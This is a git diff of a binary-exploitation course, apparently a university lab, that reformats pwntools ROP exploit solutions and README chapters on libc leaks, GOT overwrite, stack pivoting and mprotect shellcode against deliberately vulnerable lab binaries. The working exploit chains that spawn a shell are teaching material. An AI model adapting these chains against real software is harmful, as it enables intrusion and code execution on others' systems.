
p64(pop_rdi) + p64(sh) + p64(elf.plt['read']) +call_system_chain = p64(pop_rdi) + p64(sh) + p64(elf.plt["read"]) chain = b"A" * off + leak_chain + ow_got_chain + call_system_chain p.send(chain + b" " * (0x200 - len(chain))) read_addr = u64(p.recv(8)) -libc.address = read_addr - libc.symbols['read'] +libc.address = read_addr - libc.symbols["read"] print("read_addr = {}".format(hex(read_addr))) -print("system_addr = {}".format(hex(libc.symbols['system']))) +print("system_addr = {}".format(hex(libc.symbols["system"]))) # gdb.attach(p) -p.send(p64(libc.symbols['system'])) +p.send(p64(libc.symbols["system"])) p.interactive() diff --git a/chapters/exploitation-techniques/return-oriented-programming-advanced/drills/02-low-stack-space/sol/exploit_mprotect.py b/chapters/exploitation-techniques/return-oriented-programming-advanced/drills/02-low-stack-space/sol/exploit_mprotect.py index 2f3d9f3..9149d57 100644 --- a/chapters/exploitation-techniques/return-oriented-programming-advanced/drills/02-low-stack-space/sol/exploit_mprotect.py +++ b/chapters/exploitation-techniques/return-oriented-programming-advanced/drills/02-low-stack-space/sol/exploit_mprotect.py @@ -2,31 +2,49 @@ binary = "rop_limited" -context.log_level = 'error' +context.log_level = "error" context.binary = binary p = process(binary) elf = ELF(binary) -libc = ELF("/usr/lib/libc.so.6") # from `ldd rop` +libc = ELF("/usr/lib/libc.so.6") # from `ldd rop` off = 0x38 pop_rdi = 0x0000000000401203 pop_rsi_r15 = 0x0000000000401201 -pop_rdx = 0x000000000040113a +pop_rdx = 0x000000000040113A buf = 0x00404100 # write(1, read@got, 8) -leak_chain = p64(pop_rdi) + p64(1) + p64(pop_rsi_r15) + p64(elf.got['read']) + p64(0) + p64(pop_rdx) + p64(8) + p64(elf.plt['write']) +leak_chain = ( + p64(pop_rdi) + + p64(1) + + p64(pop_rsi_r15) + + p64(elf.got["read"]) + + p64(0) + + p64(pop_rdx) + + p64(8) + + p64(elf.plt["write"]) +) chain = b"A" * off + leak_chain + p64(elf.entry) p.send(chain + b" " * (0x80 - len(chain))) read_addr = 
u64(p.recv(8)) -libc.address = read_addr - libc.symbols['read'] +libc.address = read_addr - libc.symbols["read"] # read(0, buf, 0x200) -read_shellcode_chain = p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(buf) + p64(0) + p64(pop_rdx) + p64(0x100) + p64(elf.plt['read']) +read_shellcode_chain = ( + p64(pop_rdi) + + p64(0) + + p64(pop_rsi_r15) + + p64(buf) + + p64(0) + + p64(pop_rdx) + + p64(0x100) + + p64(elf.plt["read"]) +) chain = b"A" * off + read_shellcode_chain + p64(elf.entry) p.send(chain + b" " * (0x80 - len(chain))) @@ -34,7 +52,16 @@ p.send(shellcode + b"\x00" * (0x100 - len(shellcode))) # mprotect(buf, 0x200, 7) -call_mprotect_chain = p64(pop_rdi) + p64(buf-0x100) + p64(pop_rsi_r15) + p64(0x200) + p64(0) + p64(pop_rdx) + p64(7) + p64(libc.symbols['mprotect']) +call_mprotect_chain = ( + p64(pop_rdi) + + p64(buf - 0x100) + + p64(pop_rsi_r15) + + p64(0x200) + + p64(0) + + p64(pop_rdx) + + p64(7) + + p64(libc.symbols["mprotect"]) +) # call mprotect and return to buf shellcode chain = b"A" * off + call_mprotect_chain + p64(buf) diff --git a/chapters/exploitation-techniques/return-oriented-programming-advanced/drills/02-low-stack-space/sol/exploit_ret2main.py b/chapters/exploitation-techniques/return-oriented-programming-advanced/drills/02-low-stack-space/sol/exploit_ret2main.py index 754ea8b..baaf122 100644 --- a/chapters/exploitation-techniques/return-oriented-programming-advanced/drills/02-low-stack-space/sol/exploit_ret2main.py +++ b/chapters/exploitation-techniques/return-oriented-programming-advanced/drills/02-low-stack-space/sol/exploit_ret2main.py @@ -2,31 +2,40 @@ binary = "rop_limited" -context.log_level = 'error' +context.log_level = "error" context.binary = binary p = process(binary) elf = ELF(binary) -libc = ELF("/usr/lib/libc.so.6") # from `ldd rop` +libc = ELF("/usr/lib/libc.so.6") # from `ldd rop` off = 0x38 pop_rdi = 0x0000000000401203 pop_rsi_r15 = 0x0000000000401201 -pop_rdx = 0x000000000040113a +pop_rdx = 0x000000000040113A # write(1, 
read@got, 8) -leak_chain = p64(pop_rdi) + p64(1) + p64(pop_rsi_r15) + p64(elf.got['read']) + p64(0) + p64(pop_rdx) + p64(8) + p64(elf.plt['write']) +leak_chain = ( + p64(pop_rdi) + + p64(1) + + p64(pop_rsi_r15) + + p64(elf.got["read"]) + + p64(0) + + p64(pop_rdx) + + p64(8) + + p64(elf.plt["write"]) +) chain = b"A" * off + leak_chain + p64(elf.entry) p.send(chain + b" " * (0x80 - len(chain))) read_addr = u64(p.recv(8)) -libc.address = read_addr - libc.symbols['read'] +libc.address = read_addr - libc.symbols["read"] sh = next(libc.search(b"/bin/sh\x00")) # system("/bin/sh") -call_system_chain = p64(pop_rdi) + p64(sh) + p64(libc.symbols['system']) +call_system_chain = p64(pop_rdi) + p64(sh) + p64(libc.symbols["system"]) chain = b"A" * off + call_system_chain + p64(elf.entry) p.send(chain + b" " * (0x80 - len(chain))) diff --git a/chapters/exploitation-techniques/return-oriented-programming-advanced/drills/02-low-stack-space/sol/exploit_stack_pivot.py b/chapters/exploitation-techniques/return-oriented-programming-advanced/drills/02-low-stack-space/sol/exploit_stack_pivot.py index 92d72ec..88f46e2 100644 --- a/chapters/exploitation-techniques/return-oriented-programming-advanced/drills/02-low-stack-space/sol/exploit_stack_pivot.py +++ b/chapters/exploitation-techniques/return-oriented-programming-advanced/drills/02-low-stack-space/sol/exploit_stack_pivot.py @@ -2,40 +2,67 @@ binary = "rop_limited" -context.log_level = 'error' +context.log_level = "error" context.binary = binary p = process(binary) elf = ELF(binary) -libc = ELF("/usr/lib/libc.so.6") # from `ldd rop` +libc = ELF("/usr/lib/libc.so.6") # from `ldd rop` off = 0x30 pop_rdi = 0x0000000000401203 pop_rsi_r15 = 0x0000000000401201 -pop_rdx = 0x000000000040113a +pop_rdx = 0x000000000040113A leave_ret = 0x0000000000401162 buf = 0x00404800 # read(0, buf, 0x100) -new_stack_read = p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(buf) + p64(0) + p64(pop_rdx) + p64(0x100) + p64(elf.plt['read']) +new_stack_read = ( + 
p64(pop_rdi) + + p64(0) + + p64(pop_rsi_r15) + + p64(buf) + + p64(0) + + p64(pop_rdx) + + p64(0x100) + + p64(elf.plt["read"]) +) # write(1, read@got, 8) -leak_chain = p64(pop_rdi) + p64(1) + p64(pop_rsi_r15) + p64(elf.got['read']) + p64(0) + p64(pop_rdx) + p64(8) + p64(elf.plt['write']) +leak_chain = ( + p64(pop_rdi) + + p64(1) + + p64(pop_rsi_r15) + + p64(elf.got["read"]) + + p64(0) + + p64(pop_rdx) + + p64(8) + + p64(elf.plt["write"]) +) # read(0, read@got, 8) -ow_got_chain = p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(elf.got['read']) + p64(0) + p64(pop_rdx) + p64(8) + p64(elf.plt['read']) +ow_got_chain = ( + p64(pop_rdi) + + p64(0) + + p64(pop_rsi_r15) + + p64(elf.got["read"]) + + p64(0) + + p64(pop_rdx) + + p64(8) + + p64(elf.plt["read"]) +) # read(buf) -> system("/bin/sh") -call_system_chain = p64(pop_rdi) + p64(buf + 8 * 19) + p64(elf.plt['read']) +call_system_chain = p64(pop_rdi) + p64(buf + 8 * 19) + p64(elf.plt["read"]) -chain = b"A" * off + p64(buf-8) + new_stack_read + p64(leave_ret) +chain = b"A" * off + p64(buf - 8) + new_stack_read + p64(leave_ret) p.send(chain + b" " * (0x80 - len(chain))) chain = leak_chain + ow_got_chain + call_system_chain + b"/bin/sh\x00" p.send(chain + b" " * (0x100 - len(chain))) read_addr = u64(p.recv(8)) -libc.address = read_addr - libc.symbols['read'] +libc.address = read_addr - libc.symbols["read"] -p.send(p64(libc.symbols['system'])) +p.send(p64(libc.symbols["system"])) p.interactive() diff --git a/chapters/exploitation-techniques/return-oriented-programming-advanced/reading/README.md b/chapters/exploitation-techniques/return-oriented-programming-advanced/reading/README.md index 74d66ab..198a177 100644 --- a/chapters/exploitation-techniques/return-oriented-programming-advanced/reading/README.md +++ b/chapters/exploitation-techniques/return-oriented-programming-advanced/reading/README.md @@ -1,37 +1,19 @@ ---- -linkTitle: Return Oriented Programming Advanced -type: docs -weight: 10 ---- +# Return-Oriented Programming 
Advanced -# Return Oriented Programming Advanced +In this session we are going to dive deeper into Return-Oriented Programming and setbacks that appear in modern exploitation. +Topics covered: -## Table of Contents +- ROP for syscalls and 64 bits +- Dealing with ASLR in ROP +- Dealing with low space in the overflown buffer +- Combining ROP and shellcodes -* [Return Oriented Programming Advanced](#return-oriented-programming-advanced) - * [Calling Conventions in the ROP Context](#calling-conventions-in-the-rop-context) - * [ROP gadgets on x86_64](#rop-gadgets-on-x86_64) - * [Libc leaks](#libc-leaks) - * [Challenges](#challenges) - * [01. Challenge - Using ROP to Leak and Call system](#01-challenge---using-rop-to-leak-and-call-system) - * [02. Challenge - Handling Low Stack Space](#02-challenge---handling-low-stack-space) - * [03. Challenge - Stack Pivoting](#03-challenge---stack-pivoting) - * [04. Challenge - mprotect](#04-challenge---mprotect) - * [Further Reading](#further-reading) - - -In this lab we are going to dive deeper into *Return Oriented Programming* and setbacks that appear in modern exploitation. Topics covered: - - * ROP for syscalls and 64 bits - * Dealing with ASLR in ROP - * Dealing with low space in the overflown buffer - * Combining ROP and shellcodes - -As the basis of the lab we will use a program based on a classical CTF challenge called *ropasaurusrex* and gradually make exploitation harder. +As the basis of the lab we will use a program based on a classical CTF challenge called `ropasaurusrex` and gradually make exploitation harder. ## Calling Conventions in the ROP Context -As you know, the calling convention for 32 bits uses the stack. This means that setting up parameters is as easy as just writing them in the payload. +As you know, the calling convention for 32 bits uses the stack. +This means that setting up parameters is as easy as just writing them in the payload. 
We can see how a function call is generated in this [Compiler Explorer example](https://gcc.godbolt.org/z/MPG5MhEnE). @@ -61,10 +43,12 @@ syscall ## ROP gadgets on x86_64 -On `x86_64` the ROP payloads will have to be built differently than on `x86` because of the different calling convention. Having the function arguments stored in registers means that you don't need to do stack cleanup anymore, but you will need gadgets with **specific registers** to pop the arguments into. +On `x86_64` the ROP payloads will have to be built differently than on `x86` because of the different calling convention. +Having the function arguments stored in registers means that you don't need to do stack cleanup anymore, but you will need gadgets with **specific registers** to pop the arguments into. -For example to do the `read(0, buf, size)` *libc call* to do this call your payload will need to look like: -``` +For example to do the `read(0, buf, size)` libc call to do this call your payload will need to look like: + +```text pop rdi; ret 0 pop rsi, ret @@ -76,11 +60,14 @@ call read@plt ## Libc leaks -You might have already encountered in other tasks the need to leak values or addresses. Most of the time, if you want to get a shell, you won't have a convenient `system@plt` symbol present in your binary, and ASLR will most often be activated; so you will have to compute it relative to another libc symbol at runtime. +You might have already encountered in other tasks the need to leak values or addresses. +Most of the time, if you want to get a shell, you won't have a convenient `system@plt` symbol present in your binary, and `ASLR` will most often be activated; +so you will have to compute it relative to another libc symbol at runtime. -For this we will need to know what libc library the program is loading. For a local executable we can just run `ldd`: +For this we will need to know what libc library the program is loading. 
+For a local executable we can just run `ldd`: -``` +```console $ ldd rop linux-vdso.so.1 (0x00007ffd0834b000) libc.so.6 => /usr/lib/libc.so.6 (0x00007fec18eb6000) @@ -89,8 +76,8 @@ $ ldd rop For remote tasks you can might get an attached `libc.so`, or you can use the [Libc database](https://libc.blukat.me/) to find the correct libc based on some leaked offsets. - How to compute and use the `system` function address using pwntools: + ```python from pwn import * @@ -110,110 +97,146 @@ payload = ... + p64(libc.symbols['system']) ## Challenges -**NOTE**: All tasks from this session are 64 bit binaries, so take that into consideration when you build the ROP chains. +**Note**: All tasks from this session are 64 bit binaries, so take that into consideration when you build the ROP chains. ### 01. Challenge - Using ROP to Leak and Call system Use the `01-leak-call-system/src` executable file in order to spawn a shell. -You can now call the functions in the binary but `system` or any other appropriate function is missing and ASLR is enabled. How do you get past this? You need an information leak! To leak information we want to print it to standard output and process it. -We use calls to `printf`, `puts` or `write` for this. In our case we can use the `write` function call. +You can now call the functions in the binary but `system` or any other appropriate function is missing and ASLR is enabled. +How do you get past this? +You need an information leak! +To leak information we want to print it to standard output and process it. +We use calls to `printf`, `puts` or `write` for this. +In our case we can use the `write` function call. -> If you have a string representation of a number you can unpack it using the `unpack`/`u64` function in pwntools. It is the reverse of the `pack`/`p64` function. +If you have a string representation of a number you can unpack it using the `unpack`/`u64` function in pwntools. +It is the reverse of the `pack`/`p64` function. 
First, trigger the information leak by calling the `write` function and leaking an address from libc. -> You can use the GOT table storing libc addresses. +You can use the GOT table storing libc addresses. -You need to read the output from the above `write` call. Use `p.recv(8)` in the Python script to read the 8 bytes output of the `write` call in the ROP chain. +You need to read the output from the above `write` call. +Use `p.recv(8)` in the Python script to read the 8 bytes output of the `write` call in the ROP chain. -> Remember that you need gadgets to pop values into rdi, rsi, rdx for the `write` call. +Remember that you need gadgets to pop values into rdi, rsi, rdx for the `write` call. Find the address of the `system` call. -> Remember the libc leaks section above +Remember the libc leaks section above. -Call `system`. +Call `system()`. -> You can't write the `system` address in the ROP chain as it is different each time and the ROP chain is statically defined. You can use the GOT table again. Write an entry in the GOT table with the newly found address and call the function for that entry. It will evolve into a call to `system`. -> -> To write an entry in the GOT table use the `read` call in the ROP chain. You will feed to `read` the computed address below. -> -> For the actual parameter use the `"sh"` string already present in the vulnerable binary. Use searchmem in GDB to find the `"sh"` string in the executable. +You can't write the `system` address in the ROP chain as it is different each time and the ROP chain is statically defined. +You can use the GOT table again. +Write an entry in the GOT table with the newly found address and call the function for that entry. +It will evolve into a call to `system`. + +To write an entry in the GOT table use the `read` call in the ROP chain. +You will feed to `read` the computed address below. + +For the actual parameter use the `"sh"` string already present in the vulnerable binary.
+Use searchmem in GDB to find the `"sh"` string in the executable. ### 02. Challenge - Handling Low Stack Space -The previous binary had the luxury of plenty of stack space to be overflown. It is often the case that we don't have enough space for a long ROP chain. Let's handle that. +The previous binary had the luxury of plenty of stack space to be overflown. +It is often the case that we don't have enough space for a long ROP chain. +Let's handle that. -For the current task, switch to the `02-low-stack-space/src` sub-folder. The extra constraint here is that huge ropchains are no longer an option. +For the current task, switch to the `02-low-stack-space/src` sub-folder. +The extra constraint here is that huge ropchains are no longer an option. Find out how much space you have in the overflow and assess the situation. -> Use `gdb` and the cyclic pattern to get the information required. +Use `gdb` and the cyclic pattern to get the information required. Now follow the steps below. First trigger the info leak as before. -> Use `write` and leak the address of a GOT value. Use this to compute the address of the `system` call. +Use `write` and leak the address of a GOT value. +Use this to compute the address of the `system` call. + +You can only construct a partial ropchain. +A longer one won't fit. +So after calling `write`, call `main` again. -You can only construct a partial ropchain. A longer one won't fit. So after calling `write`, call `main` again. +Note that using `sendline` means sending out a newline character (`'\n'`) at the end of the message. +If you want to strictly send out a message without a newline, use `send`. -> Note that using `sendline` means sending out a newline character (`'\n'`) at the end of the message. If you want to strictly send out a message without a newline, use `send`. -> -> Find the address of `main` by looking at the argument for the `__libc_start_main` function. 
Check the disassembling of the program and see what is the parameter passed to the `__libc_start_main call`. -> -> After calling `main` again you will get back to the initial situation where you can exploit the buffer overflow. +Find the address of `main` by looking at the argument for the `__libc_start_main` function. +Check the disassembling of the program and see what is the parameter passed to the `__libc_start_main` call. + +After calling `main` again you will get back to the initial situation where you can exploit the buffer overflow. Insert `"sh"` string. -> This time you don't have the `"sh"` string in the binary, but you can find it in **the libc binary itself** so you can compute it the same way you compute the `system` address. In pwntools: -> ```python -> -> sh = next(libc.search(b"/bin/sh\x00")) -> ``` +This time you don't have the `"sh"` string in the binary, but you can find it in **the libc binary itself** so you can compute it the same way you compute the `system` address. +In pwntools: + +```python + +sh = next(libc.search(b"/bin/sh\x00")) +``` Call `system`. ### 03. Challenge - Stack Pivoting -Let's assume that `main` function had additional constraints that made it impossible to repeat the overflow. How can we still solve it? The method is called stack pivoting. In short, this means making the stack pointer refer another (writable) memory area that has enough space, a memory area that we will populate with the actual ROP chain. +Let's assume that `main` function had additional constraints that made it impossible to repeat the overflow. +How can we still solve it? +The method is called stack pivoting. +In short, this means making the stack pointer refer to another (writable) memory area that has enough space, a memory area that we will populate with the actual ROP chain. -> Read more about stack pivoting [here](http://neilscomputerblog.blogspot.ro/2012/06/stack-pivoting.html).
+Read more about stack pivoting [here](http://neilscomputerblog.blogspot.ro/2012/06/stack-pivoting.html). -Tour goal is to fill the actual ROP chain to a large enough memory area. We need a two stage exploit: +Your goal is to fill the actual ROP chain to a large enough memory area. +We need a two stage exploit: - * In the first stage, prepare the memory area where to fill the second stage ROP chain; then fill the memory area with the second stage ROP chain. - * In the second stage, create the actual ROP chain and feed it to the program and profit. +- In the first stage, prepare the memory area where to fill the second stage ROP chain; +then fill the memory area with the second stage ROP chain. +- In the second stage, create the actual ROP chain and feed it to the program and profit. Follow the steps below. -Use pmap or vmmap in `pwndbg` to discover the writable data section of the process. Select an address in that section (**don't** use the start address). This is where you fill the 2nd stage data (the actual ROP chain). +Use pmap or vmmap in `pwndbg` to discover the writable data section of the process. +Select an address in that section (**don't** use the start address). +This is where you fill the 2nd stage data (the actual ROP chain). -> Who not use the start address? Because `pop` instructions (which decrease the `rsp`) will go outside the memory region. +Why not use the start address? +Because `push` instructions and function calls (which decrease `rsp`) will go outside the memory region. -Create a first stage payload that calls `read` to store the 2nd stage data to the newly found memory area. After that pivot the stack pointer to the memory area address. +Create a first stage payload that calls `read` to store the 2nd stage data to the newly found memory area. +After that pivot the stack pointer to the memory area address. -> At a given address in the executable you have a call to `read` followed by a `leave; ret` gadget.
This sequence of instructions allows you to read data and then pivot the stack. -> -> The leave instruction fills the stack pointer (`rsp`) with the address of the frame pointer (`rbp`). It's equivalent to: -> ```asm -> mov rsp, rbp -> pop rbp -> ``` -Write the actual ROP chain as a second stage payload like when we didn't have space constraints. The 2nd stage will be stored to the memory area and the stack pointer will point to that. +At a given address in the executable you have a call to `read` followed by a `leave; ret` gadget. +This sequence of instructions allows you to read data and then pivot the stack. -> **Important!** Be careful when and where the stack pivoting takes place. After the `mov rsp, rbp` part of the `leave` instruction happens your stack will be pivoted, so the following `pop rbp` will happen **on the new stack**. Take this offset into account when building the payload. +The leave instruction fills the stack pointer (`rsp`) with the address of the frame pointer (`rbp`). +It's equivalent to: -### 04. Challenge - mprotect +```asm +mov rsp, rbp +pop rbp +``` -Combine everything you've learned until now and develop a complex payload to call `mprotect` to change the permissions on a memory region to read+write+execute and then instert a *shellcode* to call `system("/bin/sh")`. +Write the actual ROP chain as a second stage payload like when we didn't have space constraints. +The 2nd stage will be stored to the memory area and the stack pointer will point to that. +**Important!** +Be careful when and where the stack pivoting takes place. +After the `mov rsp, rbp` part of the `leave` instruction happens your stack will be pivoted, so the following `pop rbp` will happen **on the new stack**. +Take this offset into account when building the payload. -## Further Reading +### 04. 
Challenge - mprotect + +Combine everything you've learned until now and develop a complex payload to call `mprotect` to change the permissions on a memory region to read+write+execute and then insert a shellcode to call `system("/bin/sh")`. - * https://syscalls.kernelgrok.com/ - * http://articles.manugarg.com/systemcallinlinux2_6.html - * https://eli.thegreenplace.net/2011/11/03/position-independent-code-pic-in-shared-libraries#the-procedure-linkage-table-plt - * https://github.com/Gallopsled/pwntools-tutorial/tree/master/walkthrough +## Further Reading +- <https://syscalls.kernelgrok.com/> +- <http://articles.manugarg.com/systemcallinlinux2_6.html> +- <https://eli.thegreenplace.net/2011/11/03/position-independent-code-pic-in-shared-libraries#the-procedure-linkage-table-plt> +- <https://github.com/Gallopsled/pwntools-tutorial/tree/master/walkthrough> diff --git a/chapters/exploitation-techniques/return-oriented-programming/drills/00-demo/sol/exploit.py b/chapters/exploitation-techniques/return-oriented-programming/drills/00-demo/sol/exploit.py index f39de66..8b06d16 100644 --- a/chapters/exploitation-techniques/return-oriented-programming/drills/00-demo/sol/exploit.py +++ b/chapters/exploitation-techniques/return-oriented-programming/drills/00-demo/sol/exploit.py @@ -2,13 +2,18 @@ from pwn import * + # Print byte array as hex string "\x..\x..\x.." def print_byte_array(prefix, array): - log.info("{}: {}".format(prefix, "".join("\\x{:02x}".format(array[i]) for i in range(0, len(array))))) + log.info( + "{}: {}".format( + prefix, "".join("\\x{:02x}".format(array[i]) for i in range(0, len(array))) + ) + ) # Change to 'debug' for extensive information on classes used.
-context.log_level = 'info' +context.log_level = "info" filename = "../src/vuln" e = ELF(filename) @@ -19,7 +24,7 @@ def print_byte_array(prefix, array): starcraft_address = e.symbols[b"starcraft"] starcraft_inner_address = 0x08048519 pop_ret_gadget_address = 0x08048331 -pop_pop_ret_gadget_address = 0x080485ea +pop_pop_ret_gadget_address = 0x080485EA print("diablo: 0x{:08x}".format(diablo_address)) print("warcraft: 0x{:08x}".format(warcraft_address)) @@ -29,9 +34,19 @@ def print_byte_array(prefix, array): # buffer is at ebp-0x40 # return address is at ebp+0x4 offset = 0x44 -#payload = offset * b"A" + pack(warcraft_address) -#payload = offset * b"A" + pack(overwatch_address) + pack(pop_ret_gadget_address) + pack(0xdeadbeef) + pack(warcraft_address) -payload = offset * b"A" + pack(diablo_address) + pack(pop_pop_ret_gadget_address) + pack(0x12345678) + pack(0xaabbccdd) + pack(overwatch_address) + pack(pop_ret_gadget_address) + pack(0xdeadbeef) + pack(warcraft_address) +# payload = offset * b"A" + pack(warcraft_address) +# payload = offset * b"A" + pack(overwatch_address) + pack(pop_ret_gadget_address) + pack(0xdeadbeef) + pack(warcraft_address) +payload = ( + offset * b"A" + + pack(diablo_address) + + pack(pop_pop_ret_gadget_address) + + pack(0x12345678) + + pack(0xAABBCCDD) + + pack(overwatch_address) + + pack(pop_ret_gadget_address) + + pack(0xDEADBEEF) + + pack(warcraft_address) +) """ low address diff --git a/chapters/exploitation-techniques/return-oriented-programming/drills/00-demo/sol/exploit64.py b/chapters/exploitation-techniques/return-oriented-programming/drills/00-demo/sol/exploit64.py index 2baed4f..03f87b4 100644 --- a/chapters/exploitation-techniques/return-oriented-programming/drills/00-demo/sol/exploit64.py +++ b/chapters/exploitation-techniques/return-oriented-programming/drills/00-demo/sol/exploit64.py @@ -2,18 +2,23 @@ from pwn import * + # Print byte array as hex string "\x..\x..\x.." 
def print_byte_array(prefix, array): - log.info("{}: {}".format(prefix, "".join("\\x{:02x}".format(array[i]) for i in range(0, len(array))))) + log.info( + "{}: {}".format( + prefix, "".join("\\x{:02x}".format(array[i]) for i in range(0, len(array))) + ) + ) # Change to 'debug' for extensive information on classes used. -context.log_level = 'info' +context.log_level = "info" filename = "../src/vuln64" e = ELF(filename) context.binary = filename -#context.arch = "amd64" +# context.arch = "amd64" diablo_address = e.symbols[b"diablo"] overwatch_address = e.symbols[b"overwatch"] warcraft_address = e.symbols[b"warcraft"] @@ -29,12 +34,20 @@ def print_byte_array(prefix, array): # buffer is at rbp-0x40 # return address is at rbp+0x8 offset = 0x48 -#payload = offset * b"A" + pack(warcraft_address) -#payload = offset * b"A" + pack(pop_rdi_ret_gadget_address) + pack(0xdeadbeef) + pack(overwatch_address) -payload = offset * b"A" + pack(pop_rdi_ret_gadget_address) + pack(0x12345678) + pack(pop_rsi_r15_gadget_address) + pack(0xaabbccdd) + pack(0) + pack(diablo_address) +# payload = offset * b"A" + pack(warcraft_address) +# payload = offset * b"A" + pack(pop_rdi_ret_gadget_address) + pack(0xdeadbeef) + pack(overwatch_address) +payload = ( + offset * b"A" + + pack(pop_rdi_ret_gadget_address) + + pack(0x12345678) + + pack(pop_rsi_r15_gadget_address) + + pack(0xAABBCCDD) + + pack(0) + + pack(diablo_address) +) # It won't work. Payload is too large. 
-#payload = offset * b"A" + pack(pop_rdi_ret_gadget_address) + pack(0xdeadbeef) + pack(overwatch_address) + pack(pop_rdi_ret_gadget_address) + pack(0x12345678) + pack(pop_rsi_r15_gadget_address) + pack(0xaabbccdd) + pack(0) + pack(diablo_address) +# payload = offset * b"A" + pack(pop_rdi_ret_gadget_address) + pack(0xdeadbeef) + pack(overwatch_address) + pack(pop_rdi_ret_gadget_address) + pack(0x12345678) + pack(pop_rsi_r15_gadget_address) + pack(0xaabbccdd) + pack(0) + pack(diablo_address) """ diff --git a/chapters/exploitation-techniques/return-oriented-programming/drills/00-demo/src/exploit.py b/chapters/exploitation-techniques/return-oriented-programming/drills/00-demo/src/exploit.py index e2a0f6c..1e95019 100644 --- a/chapters/exploitation-techniques/return-oriented-programming/drills/00-demo/src/exploit.py +++ b/chapters/exploitation-techniques/return-oriented-programming/drills/00-demo/src/exploit.py @@ -2,13 +2,18 @@ from pwn import * + # Print byte array as hex string "\x..\x..\x.." def print_byte_array(prefix, array): - log.info("{}: {}".format(prefix, "".join("\\x{:02x}".format(array[i]) for i in range(0, len(array))))) + log.info( + "{}: {}".format( + prefix, "".join("\\x{:02x}".format(array[i]) for i in range(0, len(array))) + ) + ) # Change to 'debug' for extensive information on classes used. -context.log_level = 'info' +context.log_level = "info" filename = "../src/vuln" e = ELF(filename) diff --git a/chapters/exploitation-techniques/return-oriented-programming/drills/00-demo/src/exploit64.py b/chapters/exploitation-techniques/return-oriented-programming/drills/00-demo/src/exploit64.py index 1c56937..0bc891b 100644 --- a/chapters/exploitation-techniques/return-oriented-programming/drills/00-demo/src/exploit64.py +++ b/chapters/exploitation-techniques/return-oriented-programming/drills/00-demo/src/exploit64.py @@ -2,13 +2,18 @@ from pwn import * + # Print byte array as hex string "\x..\x..\x.." 
def print_byte_array(prefix, array): - log.info("{}: {}".format(prefix, "".join("\\x{:02x}".format(array[i]) for i in range(0, len(array))))) + log.info( + "{}: {}".format( + prefix, "".join("\\x{:02x}".format(array[i]) for i in range(0, len(array))) + ) + ) # Change to 'debug' for extensive information on classes used. -context.log_level = 'info' +context.log_level = "info" filename = "../src/vuln64" e = ELF(filename) diff --git a/chapters/exploitation-techniques/return-oriented-programming/drills/03-challenge-no-ret-control/sol/skel.py b/chapters/exploitation-techniques/return-oriented-programming/drills/03-challenge-no-ret-control/sol/skel.py index a2c3785..ff329c5 100755 --- a/chapters/exploitation-techniques/return-oriented-programming/drills/03-challenge-no-ret-control/sol/skel.py +++ b/chapters/exploitation-techniques/return-oriented-programming/drills/03-challenge-no-ret-control/sol/skel.py @@ -2,6 +2,7 @@ from pwn import * + def dw(i): return struct.pack(" @@ -98,14 +51,15 @@ int main(void) ``` After compiling this code, let's look at the call to `puts()`: -``` + +```console $ objdump -D -j .text -M intel hello | grep puts 80483e4: e8 07 ff ff ff call 80482f0 ``` -If we look at the `.plt` section, we see that it starts at address `0x080482e0`, -right where the previous call jumps: -``` +If we look at the `.plt` section, we see that it starts at address `0x080482e0`, right where the previous call jumps: + +```console $ readelf --sections hello [...] [12] .plt PROGBITS 080482e0 0002e0 000040 04 AX 0 0 16 @@ -113,7 +67,8 @@ $ readelf --sections hello ``` Now let's see how the code in `.plt` looks like: -``` + +```console $ objdump -D -j .plt -M intel hello | grep -A 3 '' 080482f0 : 80482f0: ff 25 00 a0 04 08 jmp DWORD PTR ds:0x804a000 @@ -121,9 +76,10 @@ $ objdump -D -j .plt -M intel hello | grep -A 3 '' 80482fb: e9 e0 ff ff ff jmp 80482e0 <_init+0x30> ``` -We see this code performing a jump to address `0x804a000` inside the data -section. 
Let's check the binary relocations for that location: -``` +We see this code performing a jump to address `0x804a000` inside the data section. +Let's check the binary relocations for that location: + +```console $ readelf --relocs hello [...] Relocation section '.rel.plt' at offset 0x298 contains 3 entries: @@ -133,20 +89,21 @@ Relocation section '.rel.plt' at offset 0x298 contains 3 entries: ``` Ok, good, but what is actually stored at this address initially? -``` + +```console $ objdump -s -M intel -j .got.plt --start-address=0x0804a000 hello hello: file format elf32-i386 - + Contents of section .got.plt: 804a000 f6820408 06830408 16830408 ............ ``` -We recognize `f6820408` (`0x80482f6`) as being the next instruction in the -`puts@plt` stub that we disassembled above. Which then pushes 0 in the stack and -calls 0x80482e0. This is the call to the one-time resolver, and it looks like -this: -``` +We recognize `f6820408` (`0x80482f6`) as being the next instruction in the `puts@plt` stub that we disassembled above. +Which then pushes 0 in the stack and calls 0x80482e0. +This is the call to the one-time resolver, and it looks like this: + +```console $ objdump -D -j .plt -M intel hello | grep -A 3 '080482e0' 080482e0 : @@ -155,35 +112,35 @@ $ objdump -D -j .plt -M intel hello | grep -A 3 '080482e0' 80482ec: 00 00 add BYTE PTR [eax],al ``` -What's going on here? What's actually happening is lazy binding - by convention -when the dynamic linker loads a library, it will put an identifier and -resolution function into known places in the GOT. Therefore, what happens is -roughly this: on the first call of a function, it falls through to call the -default stub, it simply jumps to the next instruction. The identifier is pushed -on the stack, the dynamic linker is called, which at that point has enough -information to figure out “hey, this program is trying to find the function -foo”. 
It will go ahead and find it, and then patch the address into the GOT such -that the next time the original PLT entry is called, it will load the actual -address of the function, rather than the lookup stub. Ingenious! +What's going on here? +What's actually happening is lazy binding - by convention when the dynamic linker loads a library, it will put an identifier and resolution function into known places in the GOT. +Therefore, what happens is roughly this: on the first call of a function, it falls through to call the default stub, it simply jumps to the next instruction. +The identifier is pushed on the stack, the dynamic linker is called, which at that point has enough information to figure out “hey, this program is trying to find the function foo”. +It will go ahead and find it, and then patch the address into the GOT such that the next time the original PLT entry is called, it will load the actual address of the function, rather than the lookup stub. +Ingenious! ### Further Inspection -Going further into the resolver is left as an exercise. You can use GDB to -inspect the address in `0x8049ffc`, and what happens when this jumps there. +Going further into the resolver is left as an exercise. +You can use GDB to inspect the address in `0x8049ffc`, and what happens when this jumps there. + +## Return Oriented Programming (`ROP`) -## Return Oriented Programming (ROP) ### Motivation -In the previous sessions we discussed `ret2libc` attacks. The standard attack -was to perform an overwrite in the following way: -``` + +In the previous sessions we discussed `ret2libc` attacks. +The standard attack was to perform an overwrite in the following way: + +```text RET + 0x00: addr of system RET + 0x04: JUNK RET + 0x08: address to desired command 